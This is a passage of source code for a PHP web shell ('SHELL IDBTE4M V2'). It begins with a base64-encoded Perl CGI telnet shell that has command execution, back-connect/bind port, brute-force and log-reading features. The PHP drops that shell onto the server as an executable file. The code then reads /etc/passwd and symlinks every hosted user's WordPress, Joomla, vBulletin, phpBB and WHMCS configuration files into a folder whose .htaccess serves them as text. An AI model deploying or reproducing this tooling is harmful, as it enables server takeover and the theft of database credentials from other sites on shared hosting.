RmlsZVNpemUoJCkNCnsNCglteSAkZmlsZSA9IHNoaWZ0Ow0KCWlmKC1mICRmaWxlKQ0KCXsNCgkJcmV0dXJuIC1zICIkZmlsZSI7DQoJfQ0KCXJldHVybiAiMCI7DQp9DQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQ0Kew0KCW15ICRzaXplID0gc2hpZnQ7DQoJaWYoJHNpemUgPD0gMTAyNCkNCgl7DQoJCXJldHVybiAkc2l6ZS4gIiBCIjsNCgl9DQoJZWxzZQ0KCXsNCgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSANCgkJew0KCQkJJHNpemUgPSBzcHJpbnRmKCIlLjAyZiIsJHNpemUgLyAxMDI0KTsNCgkJCXJldHVybiAkc2l6ZS4iIEtCIjsNCgkJfQ0KCQllbHNlIA0KCQl7DQoJCQkkc2l6ZSA9IHNwcmludGYoIiUuMmYiLCRzaXplIC8gMTAyNCAvIDEwMjQpOw0KCQkJcmV0dXJuICRzaXplLiIgTUIiOw0KCQl9DQoJfQ0KfQ0Kc3ViIHRyaW0oJCkNCnsNCglteSAkc3RyaW5nID0gc2hpZnQ7DQoJJHN0cmluZyA9fiBzL15ccysvLzsNCgkkc3RyaW5nID1+IHMvXHMrJC8vOw0KCXJldHVybiAkc3RyaW5nOw0KfQ0Kc3ViIEFkZFNsYXNoZXMoJCkNCnsNCglteSAkc3RyaW5nID0gc2hpZnQ7DQoJJHN0cmluZz1+IHMvXFwvXFxcXC9nOw0KCXJldHVybiAkc3RyaW5nOw0KfQ0Kc3ViIFRyaW1TbGFzaGVzKCQpDQp7DQoJbXkgJHN0cmluZyA9IHNoaWZ0Ow0KCSRzdHJpbmc9fiBzL1wvXC8vXC8vZzsNCgkkc3RyaW5nPX4gcy9cXFxcL1xcL2c7DQoJcmV0dXJuICRzdHJpbmc7DQp9DQpzdWIgTGlzdERpcg0Kew0KCW15ICRwYXRoID0gJlRyaW1TbGFzaGVzKCRDdXJyZW50RGlyLiRQYXRoU2VwKTsNCglteSAkcmVzdWx0ID0gIjxmb3JtIG5hbWU9J2YnIG9uU3VibWl0PVwiRW5jb2RlcignZCcpXCIgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBpZD0nZCcgbmFtZT0nZCcgc2l6ZT0nNDAnIHZhbHVlPSckQ3VycmVudERpcicgLz48aW5wdXQgdHlwZT0naGlkZGVuJyBuYW1lPSdhJyB2YWx1ZT0nZ3VpJz48aW5wdXQgY2xhc3M9J3N1Ym1pdCcgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQ2hhbmdlJz48L2Zvcm0+IjsNCglpZigtZCAkcGF0aCkNCgl7DQoJCW15IEBmbmFtZSA9ICgpOw0KCQlteSBAZG5hbWUgPSAoKTsNCgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQ0KCQl7DQoJCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkNCgkJCXsNCgkJCQkkZj0kcGF0aC4kZmlsZTsNCgkJCQlpZigtZCAkZikNCgkJCQl7DQoJCQkJCXB1c2goQGRuYW1lLCRmaWxlKTsNCgkJCQl9DQoJCQkJZWxzZQ0KCQkJCXsNCgkJCQkJcHVzaChAZm5hbWUsJGZpbGUpOw0KCQkJCX0NCgkJCX0NCgkJCWNsb3NlZGlyKERJUik7DQoJCX0NCgkJQGZuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGZuYW1lOw0KCQlAZG5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZG5hbWU7DQoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4NCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4NCgkJPHRoIHdpZHRoPScxMDAnPkZpbGUgU2l6ZTwvdGg+DQoJCTx0aCB3aWR0aD0nMTUwJz5Pd25lcjwvdGg+DQoJCTx0aCB3aWR0aD0nMTAwJz5QZXJtaXNzaW9uPC90aD4NCgkJPHRoIHdpZHRoPScxNTAnPkxhc3QgTW9kaWZpZWQ8L3RoPg0KCQk8dGggd2lkdGg9JzIzMCc+QWN0aW9uPC90aD48L3RyPiI7DQoJCW15ICRzdHlsZT0ibm90bGluZSI7DQoJCW15ICRpPTA7DQoJCWZvcmVhY2ggbXkgJGQgKEBkbmFtZSkNCgkJew0KCQkJJHN0eWxlPSAoJHN0eWxlIGVxICJsaW5lIikgPyAibm90bGluZSI6ICJsaW5lIjsNCgkJCSRkID0gJnRyaW0oJGQpOw0KCQkJJGRpcm5hbWU9JGQ7DQoJCQlpZigkZCBlcSAiLi4iKSANCgkJCXsNCgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOw0KCQkJfQ0KCQkJZWxzaWYoJGQgZXEgIi4iKSANCgkJCXsNCgkJCQluZXh0Ow0KCQkJfQ0KCQkJZWxzZSANCgkJCXsNCgkJCQkkZCA9ICRwYXRoLiRkOw0KCQkJfQ0KCQkJJHJlc3VsdCAuPSAiPHRyIGNsYXNzPSckc3R5bGUnPjx0ZCBpZD0nRmlsZV8kaScgY2xhc3M9J2Rpcic+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJkVuY29kZURpcigkZCkuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQ+RElSPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPiIuJkZpbGVPd25lcigkZCkuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPiIuJkZpbGVMYXN0TW9kaWZpZWQoJGQpLiI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQ+PGEgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJyk7IHJldHVybiBmYWxzZTsgXCI+UmVuYW1lPC9hPiAgfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBkaXI6ICRkaXJuYW1lID8nKSkgeyByZXR1cm4gZmFsc2U7fVwiIGhyZWY9Jz9hPWd1aSZkPSIuJkVuY29kZURpcigkcGF0aCkuIiZyZW1vdmU9JGRpcm5hbWUnPlJlbW92ZTwvYT48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8L3RyPiI7DQoJCQkkaSsrOw0KCQl9DQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkNCgkJew0KCQkJJHN0eWxlPSAoJHN0eWxlIGVxICJsaW5lIikgPyAibm90bGluZSI6ICJsaW5lIjsNCgkJCSRmaWxlPSRmOw0KCQkJJGYgPSAkcGF0aC4kZjsNCgkJCW15ICRhY3Rpb24gPSBlbmNvZGVfYmFzZTY0KCJlZGl0ICIuJGZpbGUpOw0KCQkJJHZpZXcgPSAiP2Rpcj0iLiRwYXRoLiImdmlldz0iLiRmOw0KCQkJJHJlc3VsdCAuPSAiPHRyIGNsYXNzPSckc3R5bGUnPjx0ZCBpZD0nRmlsZV8kaScgY2xhc3M9J2ZpbGUnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiZFbmNvZGVEaXIoJHBhdGgpLiImYz0iLiRhY3Rpb24uIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD4iLiZQYXJzZUZpbGVTaXplKCZGaWxlU2l6ZSgkZikpLiI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQ+Ii4mRmlsZU93bmVyKCRmKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPiIuJkZpbGVMYXN0TW9kaWZpZWQoJGYpLiI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQ+PGEgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKTsgcmV0dXJuIGZhbHNlO1wiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0iLiZFbmNvZGVEaXIoJHBhdGgpLiImcmVtb3ZlPSRmaWxlJz5SZW1vdmU8L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPC90cj4iOw0KCQkJJGkrKzsNCgkJfQ0KCQkkcmVzdWx0IC49ICI8L3RhYmxlPjwvZGl2PiI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUcnkgdG8gVmlldyBMaXN0IFVzZXINCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBWaWV3RG9tYWluVXNlcg0Kew0KCW9wZW4gKGQwbWFpbnMsICcvZXRjL25hbWVkLmNvbmYnKSBvciAkZXJyPTE7DQoJbXkgQGNuenMgPSA8ZDBtYWlucz47DQoJY2xvc2UgZDBtYWluczsNCglteSAkc3R5bGU9ImxpbmUiOw0KCW15ICRyZXN1bHQ9IjxoMz48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+RG9tYWluICsgVXNlcjwvZm9udD48L2gzPiI7DQoJaWYgKCRlcnIpDQoJew0KCQkkcmVzdWx0IC49ICAoJzxwPkMwdWxkblwndCBCeXBhc3MgaXQgLCBTb3JyeTwvcD4nKTsNCgkJcmV0dXJuICRyZXN1bHQ7DQoJfWVsc2UNCgl7DQoJCSRyZXN1bHQgLj0gJzx0YWJsZSBpZD0iZG9tYWluIj48dHI+PHRoPmQwbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOw0KCX0NCglmb3JlYWNoIG15ICRvbmUgKEBjbnpzKQ0KCXsNCgkJaWYoJG9uZSA9fiBtLy4qP3pvbmUgIiguKj8pIiB7LykNCgkJewkNCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7DQoJCQkkZmlsZW5hbWU9IHRyaW0oIi9ldGMvdmFsaWFzZXMvIi4kMSk7DQoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7DQoJCQkkcmVzdWx0IC49ICc8dHIgc3R5bGU9IiRzdHlsZSIgd2lkdGg9NTAlPjx0ZD48YSBocmVmPSJodHRwOi8vJy4kMS4nIiB0YXJnZXQ9Il9ibGFuayI+Jy4kMS4nPC9hPjwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7DQoJCX0NCgl9DQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOw0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBWaWV3IExvZw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFZpZXdMb2cNCnsNCgkkRW5jb2RlQ3VycmVudERpciA9IEVuY29kZURpcigkQ3VycmVudERpcik7DQoJaWYoJFdpbk5UKQ0KCXsNCgkJcmV0dXJuICI8aDI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDIwcHQgVmVyZGFuYTtjb2xvcjogI2ZmOTkwMDsnPkRvbid0IHJ1biBvbiBXaW5kb3dzPC9mb250PjwvaDI+IjsNCgl9DQoJbXkgJHJlc3VsdD0iPHRhYmxlPjx0cj48dGg+UGF0aCBMb2c8L3RoPjx0aD5TdWJtaXQ8L3RoPjwvdHI+IjsNCglteSBAcGF0aGxvZz0oCScvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZycsDQoJCQknL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nJywNCgkJCScvdXNyL2xvY2FsL2FwYWNoZTIvY29uZi9odHRwZC5jb25mJywNCgkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLA0KCQkJJy92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3MvZXJyb3JfbG9nJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzL2FjY2Vzc19sb2cnLA0KCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3Mvc3VwaHBfbG9nJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzL3N0YXRzX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9hY2Nlc3NfbG9nJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzL2Vycm9yX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9saWNlbnNlX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9sb2dpbl9sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3Mvc3RhdHNfbG9nJywNCgkJCScvdmFyL2NwYW5lbC9jcGFuZWwuY29uZmlnJywNCgkJCScvdXNyL2xvY2FsL3BocC9saWIvcGhwLmluaScsDQoJCQknL3Vzci9sb2NhbC9waHA1L2xpYi9waHAuaW5pJywNCgkJCScvdmFyL2xvZy9teXNxbC9teXNxbC1iaW4ubG9nJywNCgkJCScvdmFyL2xvZy9teXNxbC5sb2cnLA0KCQkJJy92YXIvbG9nL215c3FsZGVycm9yLmxvZycsDQoJCQknL3Zhci9sb2cvbXlzcWwvbXlzcWwubG9nJywNCgkJCScvdmFyL2xvZy9teXNxbC9teXNxbC1zbG93LmxvZycsDQoJCQknL3Zhci9teXNxbC5sb2cnLA0KCQkJJy92YXIvbGliL215c3FsL215LmNuZicsDQoJCQknL2V0Yy9teXNxbC9teS5jbmYnLA0KCQkJJy9ldGMvbXkuY25mJywNCgkJCSk7DQoJbXkgJGk9MDsNCglteSAkcGVybXM7DQoJbXkgJHNsOw0KCWZvcmVhY2ggbXkgJGxvZyAoQHBhdGhsb2cpDQoJew0KCQlpZigtciAkbG9nKQ0KCQl7DQoJCQkkcGVybXM9Ik9LIjsNCgkJfWVsc2UNCgkJew0KCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7DQoJCX0NCgkJJHJlc3VsdCAuPTw8RU5EOw0KCQk8dHI+DQoNCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIG9uU3VibWl0PSJFbmNvZGVyKCdsb2ckaScpIj4NCgkJCTx0ZD48aW5wdXQgdHlwZT0idGV4dCIgaWQ9ImxvZyRpIiBuYW1lPSJjIiB2YWx1ZT0idGFpbCAtMTAwMDAgJGxvZyB8IGdyZXAgJy9ob21lJyIgc2l6ZT0nNTAnLz48L3RkPg0KCQkJPHRkPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJUcnkiIC8+PC90ZD4NCgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJjb21tYW5kIiAvPg0KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRFbmNvZGVDdXJyZW50RGlyIiAvPg0KCQkJPC9mb3JtPg0KCQkJPHRkPiRwZXJtczwvdGQ+DQoNCgkJPC90cj4NCkVORA0KCQkkaSsrOw0KCX0NCgkkcmVzdWx0IC49IjwvdGFibGU+IjsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSBkZWNvZGVfYmFzZTY0KCRpbnsnYyd9KTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQokQWN0aW9uID0gJGlueydhJ307DQoNCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29tbWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAmVHJpbVNsYXNoZXMoZGVjb2RlX2Jhc2U2NCh0cmltKCRpbnsnZCd9KSkpOw0KIyBtYWMgZGluaCB4dWF0IHRob25nIHRpbiBuZXUga28gY28gbGVuaCBuYW8hDQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOw0KY2hvbXAoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luDQp7DQoJJlBlcmZvcm1Mb2dpbjsNCn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkNCnsNCgkmUHJpbnRQYWdlSGVhZGVyKCJkIik7DQoJaWYoISRXaW5OVCkNCgl7DQoJCSRjaG1vZD1pbnQoJGlueydjaG1vZCd9KTsNCgkJaWYoJGNobW9kIG5lIDApDQoJCXsNCgkJCSRjaG1vZD1pbnQoJGlueydjaG1vZCd9KTsNCgkJCSRmaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJCQlpZihjaG1vZCgkY2htb2QsJGZpbGUpKQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBEb25lISA8L3J1bj48YnI+IjsNCgkJCX1lbHNlDQoJCQl7DQoJCQkJcHJpbnQgIjxydW4+IFNvcnJ5ISBZb3UgZG9udCBoYXZlIHBlcm1pc3Npb25zISA8L3J1bj48YnI+IjsNCgkJCX0NCgkJfQ0KCX0NCgkkcmVuYW1lPSRpbnsncmVuYW1lJ307DQoJaWYoJHJlbmFtZSBuZSAiIikNCgl7DQoJCWlmKHJlbmFtZSgkVHJhbnNmZXJGaWxlLCRyZW5hbWUpKQ0KCQl7DQoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJCX1lbHNlDQoJCXsNCgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJCX0NCgl9DQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9Ow0KCWlmKCRyZW1vdmUgbmUgIiIpDQoJew0KCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOw0KCQlpZigtZCAkcm0pDQoJCXsNCgkJCSZSbURpcigkcm0pOw0KCQl9ZWxzZQ0KCQl7DQoJCQlpZih1bmxpbmsoJHJtKSkNCgkJCXsNCgkJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJCQl9ZWxzZQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJCQl9CQkJDQoJCX0NCgl9DQoJcHJpbnQgJkxpc3REaXI7DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kDQp7DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCXByaW50ICZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgInNhdmUiKQkJCQkgCSMgdXNlciB3YW50cyB0byBzYXZlIGEgZmlsZQ0Kew0KCSZQcmludFBhZ2VIZWFkZXI7DQoJaWYoJlNhdmVGaWxlKCRpbnsnZGF0YSd9LCRpbnsnZmlsZSd9KSkNCgl7DQoJCXByaW50ICI8cnVuPiBEb25lISA8L3J1bj48YnI+IjsNCgl9ZWxzZQ0KCXsNCgkJcHJpbnQgIjxydW4+IFNvcnJ5ISBZb3UgZG9udCBoYXZlIHBlcm1pc3Npb25zISA8L3J1bj48YnI+IjsNCgl9DQoJcHJpbnQgJkxpc3REaXI7DQp9ZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQ0Kew0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCglwcmludCAmVXBsb2FkRmlsZTsNCn1lbHNpZigkQWN0aW9uIGVxICJiYWNrYmluZCIpIAkJCQkjIHVzZXIgd2FudHMgdG8gYmFjayBjb25uZWN0IG9yIGJpbmQgcG9ydA0Kew0KCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsNCglwcmludCAmQmFja0JpbmQ7DQp9ZWxzaWYoJEFjdGlvbiBlcSAiYnJ1dGVmb3JjZXIiKSAJCQkjIHVzZXIgd2FudHMgdG8gYnJ1dGUgZm9yY2UNCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KCXByaW50ICZCcnV0ZUZvcmNlcjsNCn1lbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpIAkJCQkjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlDQp7DQoJcHJpbnQgJkRvd25sb2FkRmlsZTsNCn1lbHNpZigkQWN0aW9uIGVxICJjaGVja2xvZyIpIAkJCQkjIHVzZXIgd2FudHMgdG8gdmlldyBsb2cgZmlsZQ0Kew0KCSZQcmludFBhZ2VIZWFkZXI7DQoJcHJpbnQgJlZpZXdMb2c7DQoNCn1lbHNpZigkQWN0aW9uIGVxICJkb21haW5zdXNlciIpIAkJCSMgdXNlciB3YW50cyB0byB2aWV3IGxpc3QgdXNlci9kb21haW4NCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KCXByaW50ICZWaWV3RG9tYWluVXNlcjsNCn1lbHNpZigkQWN0aW9uIGVxICJsb2dvdXQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ0KJlByaW50UGFnZUZvb3Rlcjs=';
1852
1853$file = fopen("idb.te4m" ,"w+");
1854$write = fwrite ($file ,base64_decode($cgi4e));
1855fclose($file);
1856chmod("idb.te4m",0755);
1857echo "</br></br><center><b>GO TO : <br><a href='~_~/idb.te4m' target='_blank'>[+] CGI TELNET [+]</a></center></br>";
1858}
1859?>
1860<?php
1861// SHELL IDBTE4M V2
1862// BY ./KEFIEX404 IDBTE4M
1863set_time_limit(0);
1864error_reporting(0);
1865
1866
1867$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
1868$u = explode("/",$pageURL );
1869$pageURL =str_replace($u[count($u)-1],"",$pageURL );
1870
1871$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
1872$u = explode("/",$pageFTP );
1873$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
1874?>
1875
1876<?php
1877if (isset($_GET['idb']) && ($_GET['idb'] == 'config')) {
1878?>
1879<form action="?&idb=config" method="post">
1880<?php
1881@ini_set('max_execution_time',0);
1882@ini_set('display_errors', 0);
1883@ini_set('file_uploads',1);
1884echo '<form method="POST"><textarea cols="30" name="passwd" rows="10">';
1885$uSr=file("/etc/passwd");
1886foreach($uSr as $usrr) {
1887$str=explode(":",$usrr); echo $str[0]."\n"; }
1888?>
1889</textarea><br><input type="hidden" class="input" name="folfig" value="taek" size=40 />
1890<select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
1891<input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
1892<?php
1893@ini_set('html_errors',0);
1894@ini_set('max_execution_time',0);
1895@ini_set('display_errors', 0);
1896@ini_set('file_uploads',1);
1897if ($_POST['conf']) {
1898$folfig = $_POST['folfig']; $type = $_POST['type'];
1899@mkdir($folfig, 0755);
1900@chdir($folfig);
1901$htaccess="
1902Options Indexes FollowSymLinks
1903\nDirectoryIndex .my.cnf
1904\nAddType txt .php
1905\nAddType txt .my.cnf
1906\nAddType txt .accesshash
1907\nAddHandler txt .php
1908\nAddHandler txt .cnf
1909\nAddHandler txt .accesshash
1910";
1911file_put_contents(".htaccess",$htaccess,FILE_APPEND);
1912$passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
1913foreach($passwd as $pwd){ $user=trim($pwd);
1914@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1915@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1916@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1917@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1918@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1919@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1920@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1921@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1922@symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1923@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1924@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1925@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1926@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1927@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1928@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1929@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1930@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1931@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
